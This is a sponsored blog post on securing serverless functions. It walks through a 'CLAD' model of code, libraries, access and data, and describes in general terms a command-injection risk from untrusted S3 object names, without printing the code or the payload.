How to Achieve Ironclad Serverless Security
Snyk sponsored this post.
Serverless means different things to different people, so just to align the syntax early, this post will focus on functions — such as Lambda functions, Google Cloud functions or Azure functions. Basically the functions that run on top of a cloud that manages these functions for you — along with their VM operations — out of the box.
While this post will focus on the gaps, and provide practical takeaways of what you can actually do in order to improve your serverless security posture, let’s start off with the good news: serverless has inherent security advantages and was built to implicitly manage security by design. Some examples:
- Unpatched Operating Systems. Serverless basically removes any server wrangling — patching, upgrading, and such — since serverless servers (an oxymoron of sorts) are maintained and patched for you.
- DoS Attacks. Serverless naturally elastically scales and is by design meant to handle volumes of traffic; and this is not limited to “good traffic” alone. “Bad traffic,” in an attempt to create a denial of service, also scales well on serverless. While you can still get DoSed, or a hefty bill as a result of a spike in traffic, it’s much more difficult to achieve a DoS attack with serverless.
- Long-Standing Compromised Servers. Serverless servers are inherently short-lived — meaning that if attackers want to gain access to your server, install an agent and do malicious activity, this is typically more difficult with servers that are torn down rapidly. Therefore they would need to plan a well-executed end-to-end attack in advance, which is harder and carries a higher risk of exposure.
With that said, there are still quite a few security aspects that need to be taken into account when choosing to use serverless technology. There are some good practices that you can apply to minimize these risks, which I call the CLAD Model.
The CLAD Model
- Code. Your functions code that may contain vulnerabilities.
- Libraries. Libraries with application dependencies (binaries pulled in through your application) that may contain vulnerabilities.
- Access. Configurations that enable excessive permissions or access to sensitive data or functions.
- Data. Which is a different beast in serverless operations, as you take away the transient data that may live on a server.
Show Me the Code
Code is at the heart of serverless, so let’s start by checking out an example. (Taken from OWASP).
This code example is a Lambda function in Python that simulates an e-commerce store that writes an S3 file, which amends the file to update the date when a service is fulfilled.
Let’s zoom in on the scariest bit of this simple piece of code. If you were looking closely, you probably noticed the line of code that contains the
os.system — where oftentimes ‘there be dragons’, i.e. proceed with caution. That is indeed the case here as well.
However, the real security breach actually happens a few lines up.
We’re used to referring to S3 files, but S3 are actually objects — and objects can contain any UTF-8 character, including a semicolon (;).
So with this possible, when later
os.system is called, we can replace the curly braces with the download path, which potentially allows a remote command execution. If the payload was to look like this:
…that can enable the sending of malicious code to a malicious server.
Key Takeaway #1
There’s really nothing in serverless to protect you against such an attack. (Although this can, of course, also happen in a non-serverless operation as well).
The important thing to note here is not that we trusted the HTTP input, but rather the familiarity of the S3 file name, which is a very common mistake in the world of serverless.
While as a general trend, we have learned to be cautious with HTTP traffic, if we think about functions in the context of security, a best practice is to think about each function as its own perimeter. This function code makes an assumption, that the S3 bucket itself is safe and that an attacker cannot create files within that S3 bucket. And it shouldn’t have made that assumption.
What You Can Do About It:
Validate that this function is secure, even if the functions around it are not ironclad. Because the essence of serverless is that it is made up of blocks that you can move around, and even combine in different ways.
- Secure your code, and beware of event inputs; not just HTTP, but also SNS, S3 filenames, and objects.
- Treat every function as a perimeter.
- Use shared libraries for scale. It’s not practical or realistic to think that developers will be able to do this for every function, so a best practice would be to create shared, sanitized libraries.
The Libraries: Beware of Zero Days’ in Stale Dependencies
These are essentially the “sprinkles” of infrastructure in your application code. While we usually think of serverless as code-only, these libraries represent the infrastructure within your application code. Just like an operating system or server might have an unpatched service (e.g. NGINX), a function might have an unpatched expressjs or other library. And the numbers might surprise you.
Dependencies in Serverless Functions
|Language||Median # of direct dep’s|
Based on the Snyk vulnerability database, these are the median numbers of direct dependencies that serverless functions have in Snyk-scanned projects — and they’re pretty substantial. Where the plot thickens is in the dependencies within the components that these projects use.
|Language||Median # of direct dep’s||Median # of total dep’s|
When we look at these numbers, the total number of dependencies is dramatically higher — by one or more orders of magnitude. With such a significant amount of components, there are many that can have vulnerabilities or can become stale, where older unmaintained versions have new vulnerabilities discovered.
|Language||Median # of direct dep’s||Median # of total dep’s||# zero-days last 12 months|
In this final snapshot, focusing on these four ecosystems alone, you can see the number of zero-day vulnerabilities disclosed in just the last 12 months. Even with just back of the napkin math, when thinking about many functions, the many libraries and their vulnerabilities, the likelihood of having some significant “holes in your fence” — i.e. ways for attackers to just come right in — well, the odds are pretty high. Which is the infrastructure-like risk you need to tackle.
What You Can Do About It:
First, you need to know what you have. Start with inventory and note which components are being used by which function. This is demonstrated below with Snyk specifically on the lambda functions (but this can also be done through a Github repo). This essentially should be done even if you’re not using Snyk, by tracking new vulnerabilities within the components being used by your functions — particularly those running in production.
Second, you need to invest in remediation. The reality is that you will receive these alerts often, as these vulnerabilities happen all the time. So you want to ensure that the remediation path is easy, typically through an upgrade, and roll that out as quickly as possible.
- Find, track, and fix vulnerable libraries.
- Streamline and automate remediation.
- Once you know your inventory over time, be ready for zero-days & to fix them as quickly as possible.
Access: What your Functions Can Do vs. What they Should Do
While serverless functions are very powerful, they should provide the minimum access possible to run the function well.
In serverless, you often see this pattern (this of course is not exclusive to serverless, it happens in every ecosystem). In this YAML file, you have a single file to define multiple functions — with
get — which makes sense as they are all deployed together. Generally, there are different considerations for whether this is a good or bad practice — but it’s common. However, note that at the top of the file you have permissions: the set of the IAM roles and what they are allowed to do.
Putting all of these into one file, while convenient, actually gives each one of these functions a superset of the permissions that each one of these functions needs. Permissions are easy to give, and hard to contract. After giving permissions, it becomes very scary to revoke these — it’s hard to know what may break. So the reality is: they never contract, they just expand and expand (until someone adds an asterisk).
So, you should really invest in shrinking these privileges by having the right policies in place from the get-go. While a single policy is the easier way to go, investing in more granular and specific policies is safer. Once you do this well, you will find yourself better off than you were before.
With monoliths, if you have a single app and it has all of these functions rolled into one, the platforms don’t allow you to apply different policies to different pieces of code. However, serverless functions DO allow you to do this, so you are encouraged to take advantage of this built-in security benefit.
What You Can Do About It:
- Give functions the minimal permissions, even if it’s harder.
- Isolate experiments from production; While it’s easy to rapidly deploy functions to do experiments, sometimes (as noted before) the code or libraries may have vulnerabilities and this code goes stale, making this a risky practice. Assuming production functions get the proper care and maintenance required, anything experimental that will not receive the same level of attention, should be segregated from the more secure surrounding and customer data.
- Track unused permissions and reduce them; If you would like to level up and actually improve your system over time, you should track unused permissions and reduce them gradually. You can do this through logs or even chaos engineering — remove a permission and be ready for what happens. Building this competency enables you to increase the security of your functions and application over time.
Data: Input and Output into Your Functions
At the end of the day applications are typically just processing data. It’s some piece of logic that takes some data in, and outputs other data; and serverless is no different. Your functions just process data, and they need to do it well. However, with serverless there is the added concern that you’ve lost the ability to store transient data — such as session or log data — that you may have temporarily put on the machine, or held in-memory with typical non-serverless operations.
The result is that much more data gets stored outside of the function, which may get stored into some datastore’s cache (e.g. Redis cache), and you need to be mindful of how you secure that data. The same way that we discussed the function’s perimeter, you don’t know who has access to that data. See the example below (again using Snyk, but you can use various solutions for this):
In this code we’re inspecting the Terraform script that deploys a serverless function, where logging is enabled outside of the function (which makes sense, as you don’t want to store log data on a short-lived immutable server), however encryption was not enabled. Which in this case is solely a recommendation; and when they’re not encrypted at rest, it’s unknown who has access to these logs.
Don’t forget that data is important, and serverless does not make your data concerns magically go away.
What You Can Do About It:
- Keep secrets away from code in secure storage (e.g. KMS or at least environment variables). This may add some complexity, as serverless is extremely “easy”. It becomes easy to just check-in some key into your code repository. But I can’t stress this enough: don’t do this, as it’s easy to steal and hard to rotate.
- Secure data in transit. When data is moving between network entities, make sure you are securing these functions when in transit, especially when you call third-party components or when reading data back. Because it’s not all on the same machine, you cannot trust all channels that these functions are communicating on — which creates fragility in your systems.
- Purge and encrypt transient/session data. There will be more of it due to lack of state. If previously with non-serverless transient data you were used to just storing in cache or memory, with serverless you should consider encrypting it.
Wrapping up: Building for Scale with DevSecOps as a Backbone
Serverless implicitly provides security mechanisms; however you are left to handle the Code, Libraries, Access and Data yourself.
Serverless is built for scale, and while today you may have a manageable number of functions for which you manually audit and survey security, this of course does not scale. Therefore, it’s important to invest in automation and observability early, in order to avoid waking up with a disaster tomorrow. It’s recommended to build in security practices from the ground floor — as well as be aware of the functions you have, the security status of their components, and the permissions — in order to get ahead of the security curve, instead of finding yourself having to untangle a mess.
At a higher level than the technology, serverless is essentially about the speed of being able to deploy functions rapidly — that are small units that work with good APIs. There’s almost no opportunity or time for an external security team to be included in the deployment process. That’s why the only real way to scale is through the DevSecOps approach. Where the core is empowering developers by giving them the tools, ownership, and mandate to secure what they are building. Then the security team has the job of helping developers do this better and better, more easily and with less friction all the time, and making sure that they actually do implement the recommended security practices.
The CLAD model scales security beyond serverless. It is applicable for all cloud native development, and should be considered essential in modern engineering practices.
You can find more serverless exploit examples and practical code examples in this serverless-goof repo.
Feature image via Pixabay.